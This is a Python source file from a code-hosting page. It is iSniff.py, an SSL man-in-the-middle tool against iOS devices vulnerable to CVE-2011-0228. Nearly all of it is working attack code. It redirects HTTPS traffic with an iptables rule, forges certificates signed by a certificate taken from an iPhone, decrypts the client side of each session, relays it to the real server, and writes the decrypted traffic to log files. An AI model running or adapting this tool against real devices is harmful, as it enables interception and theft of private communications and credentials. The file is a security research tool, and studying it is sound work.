-
Notifications
You must be signed in to change notification settings - Fork 8
/
iSniff.py
executable file
·202 lines (188 loc) · 8.87 KB
/
iSniff.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
#! /usr/bin/env python
# iSniff.py [updated release 2011-08-25]
#
# SSL man-in-the-middle tool inspired by Moxie Marlinspike's sslsniff 0.8
#
# Successfully tested against iOS < 4.3.5 devices vulnerable to CVE-2011-0228
# basic constraints validation issue (see http://support.apple.com/kb/HT4824)
# discovered by Gregor Kopf / Paul Kehrer
#
# Written by hubert(a)pentest.com / @hubert3
#
# Redirect SSL traffic from NAT'd clients to iSniff as follows:
#
# iptables -t nat -A PREROUTING -p tcp --destination-port 443 -j REDIRECT --to-ports 2000
#
# Linux/iptables is currently required for iSniff to determine the intended destination
# of redirected traffic and generate working certs. Other platforms are not supported.
#
# Any certificate trusted by iOS can be used as signing_cert - The example config below
# uses an APNS cert extracted from an iPhone using 'nimble' (tool and cert not included).
# The certificate chain constructed with this config is similar to the one presented at
# https://issl.recurity.com. Website certs issued by other trusted CAs such as Verisign,
# Startcom, Comodo etc. also work.
#
# Tested on Debian GNU/Linux 6.0 (kernel 2.6.32-5-686, Python 2.6.6)
# Packages required: python-m2crypto
import M2Crypto, ssl, SocketServer, socket, struct, random, os.path, sys, time
from SSL_Certificate_CN2 import getCertHostnames
from threading import Thread
from color import *
# ---------------------------------------------------------------------------
# Configuration
# ---------------------------------------------------------------------------
# Certificate (and matching private key) used to sign the forged leaf certs.
signing_cert = 'iphone_device.pem'
signing_cert_key = 'iphone_device.key'
# first ca cert specified below must be the issuer of signing_cert (often an intermediate CA cert)
cacerts = ['cacerts/apple_iphone_device_ca.pem','cacerts/apple_iphone_ca.pem','cacerts/apple_root.pem']
add_extra_hostnames = False #add extra subjectAltNames to fake certs generated, e.g. 'google.com' if CN=www.google.com
bind_host = '0.0.0.0'
bind_port = 2000

# ---------------------------------------------------------------------------
# Shared state (accessed from the per-connection handler threads)
# ---------------------------------------------------------------------------
RemoteHostnames = {} #key=remote IP address, value=list of hostnames (CN/subjectAltNames) in remote cert
GeneratedCert = {} #key=remote IP address, value=tuple of filenames (cert & key) generated by iSniff
CertQueue = set() #remote IPs for which cert generation has been started
NameLookupQueue = set() #remote IPs for which a hostname lookup has been started

# The signing cert itself goes first in the chain, followed by its issuers.
cacerts.insert(0,signing_cert)

# Build one long string of concatenated PEM files representing the complete
# chain; it is appended to every generated leaf certificate. Each file is
# closed as soon as it has been read.
_chain_parts = []
for ca in cacerts:
    with open(ca) as _pem:
        _chain_parts.append(_pem.read())
certchain = ''.join(_chain_parts)
def getCertHostnamesCached(ip):
    """Return the hostnames found in the certificate served by *ip*.

    The first caller for a given IP records it in NameLookupQueue, performs
    the lookup through getCertHostnames() and returns the result. This
    function does not store the result in RemoteHostnames itself; that is
    done by the caller (see SingleTCPHandler.handle).

    Any other caller for the same IP polls RemoteHostnames every 0.1 seconds
    until an entry for the IP exists, then returns that entry.

    NOTE: if the first lookup raises, or its caller never stores the result,
    the polling callers never leave the wait loop.
    """
    if ip not in NameLookupQueue:
        # Nobody has started a lookup for this IP yet: claim it and do the work.
        NameLookupQueue.add(ip)
        names = getCertHostnames(ip)
        print(warning('Server %s hostnames: %s' % (ip, names)))
        return names

    # Another thread is (or was) looking up this IP; wait for its published result.
    while ip not in RemoteHostnames:
        time.sleep(0.1)
    return RemoteHostnames[ip]
def CreateSignedX509Certificate(ip, hostnames, peername):
    """Generate, once per destination IP, a leaf certificate signed by signing_cert.

    The certificate's CN is hostnames[0]; any further entries of *hostnames*
    are added as DNS subjectAltNames. The certificate (followed by the
    module-level certchain) is written to certs/CN_<cn>_IP_<ip>.pem and the
    freshly generated private key to the same path with a .key suffix. The
    pair of filenames is then published in GeneratedCert[ip].

    If another thread has already claimed *ip* (it is in CertQueue), this call
    polls GeneratedCert every 0.1 seconds until the result is published
    instead of generating a second certificate.

    Parameters:
        ip        -- destination IP address, used as cache key and in the filename
        hostnames -- non-empty list of hostnames; first element is used as CN
        peername  -- unused here; kept so existing keyword callers keep working

    Returns True once a certificate for *ip* is available.
    """
    if ip in CertQueue: #if another thread is already generating a cert for this IP...
        while ip not in GeneratedCert:
            time.sleep(0.1)
        return True

    CertQueue.add(ip)
    common_name = hostnames[0]
    print(warning('Generating cert for IP %s [%s + %s]' % (ip, common_name, len(hostnames)-1)))

    def callback():
        return 'p'

    # The CN comes from the remote server's certificate, so it is untrusted:
    # keep path separators out of the filename we are about to create.
    safe_cn = common_name.replace('/', '_')
    certfile = 'certs/CN_%s_IP_%s.pem' % (safe_cn, ip) #filename of cert we're going to generate
    keyfile = certfile[:-3]+'key' #filename of associated private key

    MBSTRING_FLAG = 0x1000
    MBSTRING_ASC = MBSTRING_FLAG | 1

    # Build a certificate request carrying the subject name and a new key pair.
    x509req = M2Crypto.X509.Request()
    x509name = M2Crypto.X509.X509_Name()
    x509name.add_entry_by_txt(field='C', type=MBSTRING_ASC, entry='AU', len=-1, loc=-1, set=0)
    x509name.add_entry_by_txt(field='CN', type=MBSTRING_ASC, entry=common_name, len=-1, loc=-1, set=0)
    x509req.set_subject_name(x509name)
    # NOTE(review): MBSTRING_ASC (0x1001) is passed as gen_key's second
    # positional argument, which is presumably the RSA public exponent --
    # confirm against the M2Crypto API before changing.
    KeyPair = M2Crypto.RSA.gen_key(1024, MBSTRING_ASC, callback)
    PKey = M2Crypto.EVP.PKey(md='sha1')
    PKey.assign_rsa(KeyPair)
    x509req.set_pubkey(pkey=PKey)
    #x509req.sign(pkey=PKey, md='sha1')
    PKey.save_key(file=keyfile, cipher=None) #CSR done, save private key

    # Create the certificate itself, issued by the configured signing cert.
    signingCert = M2Crypto.X509.load_cert(signing_cert)
    newCert = M2Crypto.X509.X509()
    newCert.set_issuer(signingCert.get_subject())
    newCert.set_subject(x509req.get_subject())
    newCert.set_pubkey(x509req.get_pubkey())
    newCert.set_version(1) # this is 3 in moxie's sslsniff 0.8, which my iOS devices always reject
    newCert.set_serial_number(random.randint(1,9999999))

    # Validity window: from one year in the past to one year in the future.
    ASN1 = M2Crypto.ASN1.ASN1_UTCTIME()
    ASN1.set_time(int(time.time()-365*24*60*60))
    newCert.set_not_before(ASN1)
    ASN1.set_time(int(time.time()+365*24*60*60))
    newCert.set_not_after(ASN1)

    if len(hostnames)>1:
        # Every hostname after the CN becomes a DNS subjectAltName entry.
        SAN_string = ', '.join('DNS:%s' % hostname for hostname in hostnames[1:])
        newCert.add_ext(M2Crypto.X509.new_extension('subjectAltName', SAN_string))

    signingKey = M2Crypto.EVP.load_key(signing_cert_key)
    newCert.sign(pkey=signingKey, md='sha1')

    # Write leaf cert + chain and close the file before publishing the
    # filenames, so waiting threads never see a partially written PEM.
    with open(certfile, 'w') as pem_out:
        pem_out.write(newCert.as_pem()+certchain)
    GeneratedCert[ip] = (certfile, keyfile)
    print(stealthy('Saved as %s' % certfile))
    return True
class PipeThread(Thread):
    """Thread that relays data in one direction, from *source* to *sink*.

    *source* must provide recv(size) and *sink* must provide sendall(data)
    (as socket and SSL socket objects do). If *logfile* is truthy, every
    chunk is also written to it and flushed before being forwarded.

    The relay stops when recv() returns an empty result or when any
    exception is raised while reading, logging or sending.
    """

    # Registry of PipeThread instances that have been created and have not
    # finished running yet.
    pipes = [] #taken from http://code.activestate.com/recipes/114642

    def __init__(self, source, sink, logfile=False):
        """Store the endpoints and register this pipe in PipeThread.pipes."""
        Thread.__init__(self)
        self.source = source
        self.sink = sink
        self.logfile = logfile
        PipeThread.pipes.append(self)

    def run(self):
        """Copy chunks of up to 1024 bytes from source to sink until EOF or error."""
        try:
            while True:
                data = self.source.recv(1024)
                if not data:
                    break
                if self.logfile:
                    self.logfile.write(data)
                    self.logfile.flush()
                # sendall() keeps writing until the whole chunk is out;
                # send() may transmit only part of it and drop the rest.
                self.sink.sendall(data)
        except Exception:
            # Best effort relay: any I/O error simply ends this direction.
            pass
        finally:
            PipeThread.pipes.remove(self)
class SingleTCPHandler(SocketServer.BaseRequestHandler):
    """Handle one redirected client connection.

    For each connection the handler recovers the destination the client
    originally asked for, obtains (or generates) a certificate for it,
    performs a TLS handshake with the client using that certificate, opens
    its own TLS connection to the real destination on port 443 and starts
    two PipeThread relays between the two streams.
    """

    def handle(self):
        """Set up the intercepted connection; see the class docstring.

        If the TLS handshake with the client fails, no connection to the
        real server is attempted. Only ssl.SSLError is handled for either
        handshake; other exceptions propagate to the server framework.
        """
        SO_ORIGINAL_DST = 80
        # self.request is the client connection/socket
        dst = self.request.getsockopt(socket.SOL_IP, SO_ORIGINAL_DST, 16) # Get the original destination IP before iptables redirect
        # 16-byte result: 2-byte family, 2-byte port, 4 address bytes, 8 bytes padding.
        # The port is unpacked but not used; the upstream connection always goes to 443.
        _, dst_port, ip1, ip2, ip3, ip4 = struct.unpack("!HHBBBB8x", dst)
        dst_ip = '%s.%s.%s.%s' % (ip1, ip2, ip3, ip4)
        peer_addr = self.request.getpeername()
        peername = '%s:%s' % (peer_addr[0], peer_addr[1])
        print(success('Client %s -> %s:443' % (peername, dst_ip)))

        RemoteHostnames[dst_ip] = getCertHostnamesCached(dst_ip)
        #RemoteHostnames[dst_ip] = ['*.*.*.*','*.*.*','*.*','*'] # example fixed wildcard cert
        CN = RemoteHostnames[dst_ip][0] # SSL_Certificate_CN2 module will return CN as first list element

        if add_extra_hostnames:
            import tldextract
            extracted = tldextract.extract(CN)
            domain = extracted.domain
            tld = extracted.tld
            # kludge to work around lack of good support for SNI (server name indication) in python
            bonus_hostnames = [
                'www.%s.%s' % (domain, tld),
                '*.%s.%s' % (domain, tld),
                # without this, requests to (e.g.) https://google.com fail as the CN is
                # www.google.com and there is no subjectAltName 'google.com' in the cert.
                '%s.%s' % (domain, tld),
            ]
            for extra_name in bonus_hostnames:
                if extra_name not in RemoteHostnames[dst_ip]:
                    # however, adding extra hostnames as subjectAltNames makes other certs fail to validate, so disabled by default
                    RemoteHostnames[dst_ip].append(extra_name)

        CreateSignedX509Certificate(ip=dst_ip, hostnames=RemoteHostnames[dst_ip], peername=peername)

        # TLS handshake with the client, presenting the generated certificate.
        try:
            (certfile, keyfile) = GeneratedCert[dst_ip]
            #print 'Setting up SSL socket using %s' % certfile
            stream_phone = ssl.wrap_socket(self.request, server_side=True, certfile=certfile,
                                           keyfile=keyfile, ssl_version=ssl.PROTOCOL_TLSv1)
        except ssl.SSLError as e:
            print(error('SSLError on connection to phone (%s)' % e))
            self.finish()
            # Nothing to relay without a client stream, so do not contact the real server.
            return

        # TLS connection to the real destination.
        try:
            server_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            stream_server = ssl.wrap_socket(server_sock)
            stream_server.connect((dst_ip, 443))
        except ssl.SSLError as e:
            print(error('SSLError on connection to server (%s)' % e))
            self.finish()
            return

        # Client -> server direction, optionally logged to a per-connection file.
        if not any(pattern in CN for pattern in ['static','fbcdn','akamai','objects']): # don't bother logging requests to CDN / static content hosts
            # CN originates from the remote certificate; keep '/' out of the log filename.
            log_path = 'logs/%s-%s.log' % (CN.replace('/', '_'), peername)
            print(great_success('Logging to %s' % log_path))
            PipeThread(stream_phone, stream_server, logfile=open(log_path, 'a')).start()
        else:
            PipeThread(stream_phone, stream_server).start()
        # Server -> client direction is never logged.
        PipeThread(stream_server, stream_phone).start()
        self.finish()
class SimpleServer(SocketServer.ThreadingMixIn, SocketServer.TCPServer):
    """TCP server that combines TCPServer with ThreadingMixIn."""

    # much faster rebinding
    allow_reuse_address = True
    # Ctrl-C will cleanly kill all spawned threads
    daemon_threads = True

    def __init__(self, server_address, RequestHandlerClass):
        """Delegate construction to SocketServer.TCPServer unchanged."""
        tcp_init = SocketServer.TCPServer.__init__
        tcp_init(self, server_address, RequestHandlerClass)
if __name__ == "__main__":
    # Script entry point: create the listener on bind_host:bind_port, print
    # the usage banner and serve until interrupted.
    server = SimpleServer((bind_host, bind_port), SingleTCPHandler)
    # terminate with Ctrl-C
    try:
        banner = (
            'iSniff.py listening on %s:%s' % (bind_host, bind_port),
            'Forward traffic from iPhones / iPads running iOS < 4.3.5 using:',
            'iptables -t nat -A PREROUTING -p tcp --destination-port 443 -j REDIRECT --to-ports %s\n' % bind_port,
        )
        for banner_line in banner:
            print(info(banner_line))
        server.serve_forever()
    except KeyboardInterrupt:
        sys.exit(0)